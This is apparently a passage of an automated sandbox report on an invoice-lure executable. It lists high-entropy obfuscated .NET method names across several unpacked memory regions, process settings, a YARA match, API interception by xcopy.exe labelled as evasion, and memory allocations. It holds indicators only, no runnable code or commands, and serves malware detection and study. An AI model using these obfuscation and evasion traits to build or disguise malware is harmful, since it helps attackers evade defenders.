                Source: 0.2.Due Payment Invoice PISS2024993.exe.4e44cb0.2.raw.unpack, OErDEAHAaixDDZDpW6W.csHigh entropy of concatenated method names: 'hJUrPitfen', 'QUmr8arfaY', 'VA1rb8dJRp', 'KOIr4uwHJZ', 'M8yrEY9PmM', 'yqIr0rDiW7', 'bPkrSuqGXo', 'Rjpr93UDgL', 'yfdr1RMnuN', 'vu5rka9isO'
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4e44cb0.2.raw.unpack, VJhkqlRvoiRrIBqcn4.csHigh entropy of concatenated method names: 'sW5KdBCTwj', 'hRPKBpEsD8', 'TNCKfEWMIU', 'nLOKyVZfbN', 'WyHK23IEbL', 'AXZf3BGDqE', 'X2qfOQaOx3', 'd52fwIYQY8', 'VV1fCPlqEY', 'S7TfcBYRmm'
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4e44cb0.2.raw.unpack, AKVktvULoa69tmbaIo.csHigh entropy of concatenated method names: 'FmPb8a6XH', 'SRA4ZZGFY', 'jRN0BWAHX', 'tc7Si6ujM', 'M201BVRyl', 'k7pkvxvAu', 'zS6AndXmnMEks7F2H9', 'yEYQNVrLfjTM3GsuJh', 'Af3xxk2y5', 'ACyDcCPAy'
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4e44cb0.2.raw.unpack, uJRIXsC8TSse2Ng2qT.csHigh entropy of concatenated method names: 'A5ExMtQN08', 'nc3xB5hLJt', 'o0FxgqWVSN', 'ts2xfWoh3Y', 'KbpxK3N9MI', 'bHpxyODs1Z', 'WIox2R6Wpo', 'dxNxuowIPQ', 'lKlxo1N2FB', 'D1txGPO5Kh'
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4e44cb0.2.raw.unpack, fZJaniaQLt3UYFjfdV.csHigh entropy of concatenated method names: 'SRPyMNVpco', 'ldtygS8RYK', 'xmJyKG13oS', 'kaWKXU4mmT', 'DBcKz8OnsE', 'f1PyA9YicJ', 'U0oyHGiTDt', 'P2YyUijDIm', 'qvUylCHbd9', 'p4NyjQx80s'
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4e44cb0.2.raw.unpack, TLDvs0HlNPohFsLdrmN.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Ik8D5TxjbQ', 'GoWDnCplur', 'eZdDsK35cN', 'YLID6MG8Cq', 'sqCD3Ahmh4', 'kjVDO0uEfe', 'M6lDwFW0Zn'
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4e44cb0.2.raw.unpack, vLnWLW2yVODsKcu4eY.csHigh entropy of concatenated method names: 'CNNldDs2Gf', 'IfBlMZpNv7', 'gEelBf5dbX', 'Ku5lgpZWYa', 'eoslfyOHnr', 'FVVlKroyoD', 'kfLlyUOsAn', 'ODYl2SAYGN', 'De3lukOxK3', 'e23loBJmx7'
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4e44cb0.2.raw.unpack, AGrHCskPokfxNeiwuh.csHigh entropy of concatenated method names: 'q3LfEljE9D', 'HgqfSA2rIb', 'fXrgFBBW9m', 'lsygiAtD1R', 'ioIgvvHN9S', 'JrKgT9SpDR', 'KcwgaA2QHV', 'U3tgtjpbug', 'dSWgqGwSaE', 'MR4gZ6SWt8'
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4e44cb0.2.raw.unpack, GY0uFoWYUpjPn8RenS.csHigh entropy of concatenated method names: 'HK1p92gAWj', 'BR7p19NAFH', 'jL5pR6Bqoi', 'I0upIfKb5q', 'jaapidexCe', 'n4ypv3unFL', 'mVKpa967Rb', 'tKEptKj67c', 'INVpZ43TEn', 'sV6pL4ak82'
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4e44cb0.2.raw.unpack, n5S2k7BoiLiT93YXb2.csHigh entropy of concatenated method names: 'Dispose', 'E9hHc64YSG', 'TfIUIhX9cV', 'bSfGGMEcSm', 'O7JHXRIXs8', 'KSsHze2Ng2', 'ProcessDialogKey', 'MTdUAQ8lyu', 'inGUHm0bgM', 'Hb5UUpqvvs'
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4e44cb0.2.raw.unpack, DElvwy9pvaF1D0fn6T.csHigh entropy of concatenated method names: 'Si7B5KgEti', 'ra2Bn8m0gx', 'kl1BspR40h', 'nWNB6WxlBQ', 'LSJB3tvf9S', 'D6gBOZld0L', 'vYABwuQfFO', 'OqXBCnRhwu', 'HeVBchefOL', 'jDXBXrS69b'
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4e44cb0.2.raw.unpack, OYlk1PjZ6pbuOUm8Jl.csHigh entropy of concatenated method names: 'CH9HyElvwy', 'ovaH2F1D0f', 'QB2Hos8Z6a', 'bpWHGI4GrH', 'qiwHJuhOJh', 'FqlHmvoiRr', 'Bqos9IuCv5d4ymHNdK', 'SWrPyf3euAWAml30We', 'xpuHHATbqu', 'M2pHl1KlkK'
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4e44cb0.2.raw.unpack, eQ8lyucfnGm0bgMFb5.csHigh entropy of concatenated method names: 'VNDxRFel9w', 'vdxxInprF2', 'kMcxFDHEJ8', 'gxZxiEWbyu', 'E2lx5l69ff', 'TbrxvjWsSM', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4e44cb0.2.raw.unpack, QrhsiFI8fGT8JEOJoU.csHigh entropy of concatenated method names: 'VBnBD5hfoY9UgBaPQh2', 'TepdHvhLTl1QcVZhiAa', 'wmLKxg8DIN', 'aYkKrqL3jf', 'xTaKDOXnBU', 'iIERJthcqZj3XtEjncS', 'AWlsubhj7ga7WhER8K8', 'Y9u6S4h5jlFegX71GeR'
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4e44cb0.2.raw.unpack, UOJiyW1B2s8Z6aHpWI.csHigh entropy of concatenated method names: 'qnwg4bimWJ', 'rfGg0D5UBQ', 'xkog9D5JIr', 'ILKg16vGk2', 'm2PgJy91bx', 'CkTgmtffJk', 'DRkgeuTaqi', 'uergxPv5W3', 'E6kgrguVCh', 'zdugDnPfMC'
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4e44cb0.2.raw.unpack, nqvvsvXU7Q5cfreR9i.csHigh entropy of concatenated method names: 'v8CrHOnPPj', 'qVQrlfaLhP', 'qGNrjHdpFq', 'lY7rMgb7Tq', 'AHyrBDGRwa', 'QJgrfPqhho', 'K5GrKuRVb3', 'X5ZxwMTnJV', 'ho9xCy9A3v', 'DRqxcoZNiM'
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4e44cb0.2.raw.unpack, OyUJwmqSrpTaTYYllv.csHigh entropy of concatenated method names: 'IttyPGYkru', 'OqGy8dis6O', 'wOGyb8k1ao', 'q7Sy4ShhVw', 'MuwyEPXYSj', 'AGFy0u6T49', 'cAfySrEhFM', 'm7Qy9siOUP', 'OYay1fu31L', 'H4eykWvDWI'
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4e44cb0.2.raw.unpack, jjeIoBODgMkXuNjht9.csHigh entropy of concatenated method names: 'CF0eCDNi7l', 'mlBeXVrMXg', 'C9pxAQHZOa', 'ITmxHp4wLG', 'pOVeLvYM8m', 'OZEeVSieVT', 'JodeW60Grc', 'ri9e5qJIbC', 'OURenDKxTp', 'uhwesabk96'
                Source: 0.2.Due Payment Invoice PISS2024993.exe.7970000.4.raw.unpack, OErDEAHAaixDDZDpW6W.csHigh entropy of concatenated method names: 'hJUrPitfen', 'QUmr8arfaY', 'VA1rb8dJRp', 'KOIr4uwHJZ', 'M8yrEY9PmM', 'yqIr0rDiW7', 'bPkrSuqGXo', 'Rjpr93UDgL', 'yfdr1RMnuN', 'vu5rka9isO'
                Source: 0.2.Due Payment Invoice PISS2024993.exe.7970000.4.raw.unpack, VJhkqlRvoiRrIBqcn4.csHigh entropy of concatenated method names: 'sW5KdBCTwj', 'hRPKBpEsD8', 'TNCKfEWMIU', 'nLOKyVZfbN', 'WyHK23IEbL', 'AXZf3BGDqE', 'X2qfOQaOx3', 'd52fwIYQY8', 'VV1fCPlqEY', 'S7TfcBYRmm'
                Source: 0.2.Due Payment Invoice PISS2024993.exe.7970000.4.raw.unpack, AKVktvULoa69tmbaIo.csHigh entropy of concatenated method names: 'FmPb8a6XH', 'SRA4ZZGFY', 'jRN0BWAHX', 'tc7Si6ujM', 'M201BVRyl', 'k7pkvxvAu', 'zS6AndXmnMEks7F2H9', 'yEYQNVrLfjTM3GsuJh', 'Af3xxk2y5', 'ACyDcCPAy'
                Source: 0.2.Due Payment Invoice PISS2024993.exe.7970000.4.raw.unpack, uJRIXsC8TSse2Ng2qT.csHigh entropy of concatenated method names: 'A5ExMtQN08', 'nc3xB5hLJt', 'o0FxgqWVSN', 'ts2xfWoh3Y', 'KbpxK3N9MI', 'bHpxyODs1Z', 'WIox2R6Wpo', 'dxNxuowIPQ', 'lKlxo1N2FB', 'D1txGPO5Kh'
                Source: 0.2.Due Payment Invoice PISS2024993.exe.7970000.4.raw.unpack, fZJaniaQLt3UYFjfdV.csHigh entropy of concatenated method names: 'SRPyMNVpco', 'ldtygS8RYK', 'xmJyKG13oS', 'kaWKXU4mmT', 'DBcKz8OnsE', 'f1PyA9YicJ', 'U0oyHGiTDt', 'P2YyUijDIm', 'qvUylCHbd9', 'p4NyjQx80s'
                Source: 0.2.Due Payment Invoice PISS2024993.exe.7970000.4.raw.unpack, TLDvs0HlNPohFsLdrmN.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Ik8D5TxjbQ', 'GoWDnCplur', 'eZdDsK35cN', 'YLID6MG8Cq', 'sqCD3Ahmh4', 'kjVDO0uEfe', 'M6lDwFW0Zn'
                Source: 0.2.Due Payment Invoice PISS2024993.exe.7970000.4.raw.unpack, vLnWLW2yVODsKcu4eY.csHigh entropy of concatenated method names: 'CNNldDs2Gf', 'IfBlMZpNv7', 'gEelBf5dbX', 'Ku5lgpZWYa', 'eoslfyOHnr', 'FVVlKroyoD', 'kfLlyUOsAn', 'ODYl2SAYGN', 'De3lukOxK3', 'e23loBJmx7'
                Source: 0.2.Due Payment Invoice PISS2024993.exe.7970000.4.raw.unpack, AGrHCskPokfxNeiwuh.csHigh entropy of concatenated method names: 'q3LfEljE9D', 'HgqfSA2rIb', 'fXrgFBBW9m', 'lsygiAtD1R', 'ioIgvvHN9S', 'JrKgT9SpDR', 'KcwgaA2QHV', 'U3tgtjpbug', 'dSWgqGwSaE', 'MR4gZ6SWt8'
                Source: 0.2.Due Payment Invoice PISS2024993.exe.7970000.4.raw.unpack, GY0uFoWYUpjPn8RenS.csHigh entropy of concatenated method names: 'HK1p92gAWj', 'BR7p19NAFH', 'jL5pR6Bqoi', 'I0upIfKb5q', 'jaapidexCe', 'n4ypv3unFL', 'mVKpa967Rb', 'tKEptKj67c', 'INVpZ43TEn', 'sV6pL4ak82'
                Source: 0.2.Due Payment Invoice PISS2024993.exe.7970000.4.raw.unpack, n5S2k7BoiLiT93YXb2.csHigh entropy of concatenated method names: 'Dispose', 'E9hHc64YSG', 'TfIUIhX9cV', 'bSfGGMEcSm', 'O7JHXRIXs8', 'KSsHze2Ng2', 'ProcessDialogKey', 'MTdUAQ8lyu', 'inGUHm0bgM', 'Hb5UUpqvvs'
                Source: 0.2.Due Payment Invoice PISS2024993.exe.7970000.4.raw.unpack, DElvwy9pvaF1D0fn6T.csHigh entropy of concatenated method names: 'Si7B5KgEti', 'ra2Bn8m0gx', 'kl1BspR40h', 'nWNB6WxlBQ', 'LSJB3tvf9S', 'D6gBOZld0L', 'vYABwuQfFO', 'OqXBCnRhwu', 'HeVBchefOL', 'jDXBXrS69b'
                Source: 0.2.Due Payment Invoice PISS2024993.exe.7970000.4.raw.unpack, OYlk1PjZ6pbuOUm8Jl.csHigh entropy of concatenated method names: 'CH9HyElvwy', 'ovaH2F1D0f', 'QB2Hos8Z6a', 'bpWHGI4GrH', 'qiwHJuhOJh', 'FqlHmvoiRr', 'Bqos9IuCv5d4ymHNdK', 'SWrPyf3euAWAml30We', 'xpuHHATbqu', 'M2pHl1KlkK'
                Source: 0.2.Due Payment Invoice PISS2024993.exe.7970000.4.raw.unpack, eQ8lyucfnGm0bgMFb5.csHigh entropy of concatenated method names: 'VNDxRFel9w', 'vdxxInprF2', 'kMcxFDHEJ8', 'gxZxiEWbyu', 'E2lx5l69ff', 'TbrxvjWsSM', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Due Payment Invoice PISS2024993.exe.7970000.4.raw.unpack, QrhsiFI8fGT8JEOJoU.csHigh entropy of concatenated method names: 'VBnBD5hfoY9UgBaPQh2', 'TepdHvhLTl1QcVZhiAa', 'wmLKxg8DIN', 'aYkKrqL3jf', 'xTaKDOXnBU', 'iIERJthcqZj3XtEjncS', 'AWlsubhj7ga7WhER8K8', 'Y9u6S4h5jlFegX71GeR'
                Source: 0.2.Due Payment Invoice PISS2024993.exe.7970000.4.raw.unpack, UOJiyW1B2s8Z6aHpWI.csHigh entropy of concatenated method names: 'qnwg4bimWJ', 'rfGg0D5UBQ', 'xkog9D5JIr', 'ILKg16vGk2', 'm2PgJy91bx', 'CkTgmtffJk', 'DRkgeuTaqi', 'uergxPv5W3', 'E6kgrguVCh', 'zdugDnPfMC'
                Source: 0.2.Due Payment Invoice PISS2024993.exe.7970000.4.raw.unpack, nqvvsvXU7Q5cfreR9i.csHigh entropy of concatenated method names: 'v8CrHOnPPj', 'qVQrlfaLhP', 'qGNrjHdpFq', 'lY7rMgb7Tq', 'AHyrBDGRwa', 'QJgrfPqhho', 'K5GrKuRVb3', 'X5ZxwMTnJV', 'ho9xCy9A3v', 'DRqxcoZNiM'
                Source: 0.2.Due Payment Invoice PISS2024993.exe.7970000.4.raw.unpack, OyUJwmqSrpTaTYYllv.csHigh entropy of concatenated method names: 'IttyPGYkru', 'OqGy8dis6O', 'wOGyb8k1ao', 'q7Sy4ShhVw', 'MuwyEPXYSj', 'AGFy0u6T49', 'cAfySrEhFM', 'm7Qy9siOUP', 'OYay1fu31L', 'H4eykWvDWI'
                Source: 0.2.Due Payment Invoice PISS2024993.exe.7970000.4.raw.unpack, jjeIoBODgMkXuNjht9.csHigh entropy of concatenated method names: 'CF0eCDNi7l', 'mlBeXVrMXg', 'C9pxAQHZOa', 'ITmxHp4wLG', 'pOVeLvYM8m', 'OZEeVSieVT', 'JodeW60Grc', 'ri9e5qJIbC', 'OURenDKxTp', 'uhwesabk96'
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4dbd090.0.raw.unpack, OErDEAHAaixDDZDpW6W.csHigh entropy of concatenated method names: 'hJUrPitfen', 'QUmr8arfaY', 'VA1rb8dJRp', 'KOIr4uwHJZ', 'M8yrEY9PmM', 'yqIr0rDiW7', 'bPkrSuqGXo', 'Rjpr93UDgL', 'yfdr1RMnuN', 'vu5rka9isO'
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4dbd090.0.raw.unpack, VJhkqlRvoiRrIBqcn4.csHigh entropy of concatenated method names: 'sW5KdBCTwj', 'hRPKBpEsD8', 'TNCKfEWMIU', 'nLOKyVZfbN', 'WyHK23IEbL', 'AXZf3BGDqE', 'X2qfOQaOx3', 'd52fwIYQY8', 'VV1fCPlqEY', 'S7TfcBYRmm'
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4dbd090.0.raw.unpack, AKVktvULoa69tmbaIo.csHigh entropy of concatenated method names: 'FmPb8a6XH', 'SRA4ZZGFY', 'jRN0BWAHX', 'tc7Si6ujM', 'M201BVRyl', 'k7pkvxvAu', 'zS6AndXmnMEks7F2H9', 'yEYQNVrLfjTM3GsuJh', 'Af3xxk2y5', 'ACyDcCPAy'
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4dbd090.0.raw.unpack, uJRIXsC8TSse2Ng2qT.csHigh entropy of concatenated method names: 'A5ExMtQN08', 'nc3xB5hLJt', 'o0FxgqWVSN', 'ts2xfWoh3Y', 'KbpxK3N9MI', 'bHpxyODs1Z', 'WIox2R6Wpo', 'dxNxuowIPQ', 'lKlxo1N2FB', 'D1txGPO5Kh'
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4dbd090.0.raw.unpack, fZJaniaQLt3UYFjfdV.csHigh entropy of concatenated method names: 'SRPyMNVpco', 'ldtygS8RYK', 'xmJyKG13oS', 'kaWKXU4mmT', 'DBcKz8OnsE', 'f1PyA9YicJ', 'U0oyHGiTDt', 'P2YyUijDIm', 'qvUylCHbd9', 'p4NyjQx80s'
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4dbd090.0.raw.unpack, TLDvs0HlNPohFsLdrmN.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Ik8D5TxjbQ', 'GoWDnCplur', 'eZdDsK35cN', 'YLID6MG8Cq', 'sqCD3Ahmh4', 'kjVDO0uEfe', 'M6lDwFW0Zn'
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4dbd090.0.raw.unpack, vLnWLW2yVODsKcu4eY.csHigh entropy of concatenated method names: 'CNNldDs2Gf', 'IfBlMZpNv7', 'gEelBf5dbX', 'Ku5lgpZWYa', 'eoslfyOHnr', 'FVVlKroyoD', 'kfLlyUOsAn', 'ODYl2SAYGN', 'De3lukOxK3', 'e23loBJmx7'
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4dbd090.0.raw.unpack, AGrHCskPokfxNeiwuh.csHigh entropy of concatenated method names: 'q3LfEljE9D', 'HgqfSA2rIb', 'fXrgFBBW9m', 'lsygiAtD1R', 'ioIgvvHN9S', 'JrKgT9SpDR', 'KcwgaA2QHV', 'U3tgtjpbug', 'dSWgqGwSaE', 'MR4gZ6SWt8'
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4dbd090.0.raw.unpack, GY0uFoWYUpjPn8RenS.csHigh entropy of concatenated method names: 'HK1p92gAWj', 'BR7p19NAFH', 'jL5pR6Bqoi', 'I0upIfKb5q', 'jaapidexCe', 'n4ypv3unFL', 'mVKpa967Rb', 'tKEptKj67c', 'INVpZ43TEn', 'sV6pL4ak82'
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4dbd090.0.raw.unpack, n5S2k7BoiLiT93YXb2.csHigh entropy of concatenated method names: 'Dispose', 'E9hHc64YSG', 'TfIUIhX9cV', 'bSfGGMEcSm', 'O7JHXRIXs8', 'KSsHze2Ng2', 'ProcessDialogKey', 'MTdUAQ8lyu', 'inGUHm0bgM', 'Hb5UUpqvvs'
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4dbd090.0.raw.unpack, DElvwy9pvaF1D0fn6T.csHigh entropy of concatenated method names: 'Si7B5KgEti', 'ra2Bn8m0gx', 'kl1BspR40h', 'nWNB6WxlBQ', 'LSJB3tvf9S', 'D6gBOZld0L', 'vYABwuQfFO', 'OqXBCnRhwu', 'HeVBchefOL', 'jDXBXrS69b'
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4dbd090.0.raw.unpack, OYlk1PjZ6pbuOUm8Jl.csHigh entropy of concatenated method names: 'CH9HyElvwy', 'ovaH2F1D0f', 'QB2Hos8Z6a', 'bpWHGI4GrH', 'qiwHJuhOJh', 'FqlHmvoiRr', 'Bqos9IuCv5d4ymHNdK', 'SWrPyf3euAWAml30We', 'xpuHHATbqu', 'M2pHl1KlkK'
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4dbd090.0.raw.unpack, eQ8lyucfnGm0bgMFb5.csHigh entropy of concatenated method names: 'VNDxRFel9w', 'vdxxInprF2', 'kMcxFDHEJ8', 'gxZxiEWbyu', 'E2lx5l69ff', 'TbrxvjWsSM', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4dbd090.0.raw.unpack, QrhsiFI8fGT8JEOJoU.csHigh entropy of concatenated method names: 'VBnBD5hfoY9UgBaPQh2', 'TepdHvhLTl1QcVZhiAa', 'wmLKxg8DIN', 'aYkKrqL3jf', 'xTaKDOXnBU', 'iIERJthcqZj3XtEjncS', 'AWlsubhj7ga7WhER8K8', 'Y9u6S4h5jlFegX71GeR'
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4dbd090.0.raw.unpack, UOJiyW1B2s8Z6aHpWI.csHigh entropy of concatenated method names: 'qnwg4bimWJ', 'rfGg0D5UBQ', 'xkog9D5JIr', 'ILKg16vGk2', 'm2PgJy91bx', 'CkTgmtffJk', 'DRkgeuTaqi', 'uergxPv5W3', 'E6kgrguVCh', 'zdugDnPfMC'
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4dbd090.0.raw.unpack, nqvvsvXU7Q5cfreR9i.csHigh entropy of concatenated method names: 'v8CrHOnPPj', 'qVQrlfaLhP', 'qGNrjHdpFq', 'lY7rMgb7Tq', 'AHyrBDGRwa', 'QJgrfPqhho', 'K5GrKuRVb3', 'X5ZxwMTnJV', 'ho9xCy9A3v', 'DRqxcoZNiM'
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4dbd090.0.raw.unpack, OyUJwmqSrpTaTYYllv.csHigh entropy of concatenated method names: 'IttyPGYkru', 'OqGy8dis6O', 'wOGyb8k1ao', 'q7Sy4ShhVw', 'MuwyEPXYSj', 'AGFy0u6T49', 'cAfySrEhFM', 'm7Qy9siOUP', 'OYay1fu31L', 'H4eykWvDWI'
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4dbd090.0.raw.unpack, jjeIoBODgMkXuNjht9.csHigh entropy of concatenated method names: 'CF0eCDNi7l', 'mlBeXVrMXg', 'C9pxAQHZOa', 'ITmxHp4wLG', 'pOVeLvYM8m', 'OZEeVSieVT', 'JodeW60Grc', 'ri9e5qJIbC', 'OURenDKxTp', 'uhwesabk96'
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: Due Payment Invoice PISS2024993.exe PID: 1732, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\xcopy.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
                Source: C:\Windows\SysWOW64\xcopy.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
                Source: C:\Windows\SysWOW64\xcopy.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
                Source: C:\Windows\SysWOW64\xcopy.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
                Source: C:\Windows\SysWOW64\xcopy.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
                Source: C:\Windows\SysWOW64\xcopy.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
                Source: C:\Windows\SysWOW64\xcopy.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
                Source: C:\Windows\SysWOW64\xcopy.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeMemory allocated: 1490000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeMemory allocated: 32F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeMemory allocated: 1820000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeMemory allocated: 9A20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeMemory allocated: AA20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeMemory allocated: AC40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeMemory allocated: BC40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeMemory allocated: C300000 memory reserve | memory write watchJump to behavior
